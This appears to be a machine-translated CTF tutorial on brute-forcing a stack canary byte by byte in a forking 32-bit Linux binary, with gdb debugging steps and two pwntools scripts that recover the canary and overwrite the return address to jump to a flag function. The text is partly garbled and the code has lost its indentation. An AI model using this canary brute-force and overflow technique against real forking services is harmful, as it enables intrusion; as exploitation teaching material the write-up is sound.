one-by-one blasting Canary principle
- For Canary, although each process restarted after a different Canary, but Cannary the same process in different threads of the same, and the child process created by the fork in the canary function is the same, because the fork function will be a direct copy of the parent process RAM.
- LSB 0x00, after successive blasting, blasting canary if unsuccessful, the program crashes; blasting successful, the program performs the following logic. Which can determine whether the blast was successful.
- We can use such features, completely by-byte burst out Canary.
example
Opened the Canary protection
IDA disassembler found, the program contains a fork function, blasting may canary
stack overflow function fun
Dynamic debugging, see Offset
A breakpoint at a function at the fork Lower Dir
In the canary push at the second breakpoint
gdb bin1
b *0x0804874B
b *0x0804870C
r
set follow-fork-mode child
//跟随子进程
c
telescope $esp 35
canary
- You can be isolated and the offset between the canary EBP;
- Similarly buf and the offset between ebp
Preparation of exp, blasting
from pwn import *
context.log_level = 'debug'
context.terminal = ['gnome-terminal','-x','bash','-c']
context(arch='i386', os='linux')
local = 1
elf = ELF('./bin1')
if local:
p = process('./bin1')
libc = elf.libc
else:
p = remote('',)
libc = ELF('./')
p.recvuntil('welcome\n')
canary = '\x00'
for k in range(3):
for i in range(256):
print "the " + str(k) + ": " + chr(i)
p.send('a'*100 + canary + chr(i))
a = p.recvuntil("welcome\n")
print a
if "sucess" in a:
canary += chr(i)
print "canary: " + canary
break
After using the transmission function address payload getflag
from pwn import *
context.log_level = 'debug'
context.terminal = ['gnome-terminal','-x','bash','-c']
context(arch='i386', os='linux')
local = 1
elf = ELF('./bin1')
if local:
p = process('./bin1')
libc = elf.libc
else:
p = remote('',)
libc = ELF('./')
p.recvuntil('welcome\n')
canary = '\x00'
for k in range(3):
for i in range(256):
print "the " + str(k) + ": " + chr(i)
p.send('a'*100 + canary + chr(i))
a = p.recvuntil("welcome\n")
print a
if "sucess" in a:
canary += chr(i)
print "canary: " + canary
break
addr = 0x0804863B
payload = 'A' * 100 + canary + 'A' * 12 + p32(addr)
p.send(payload)
p.interactive()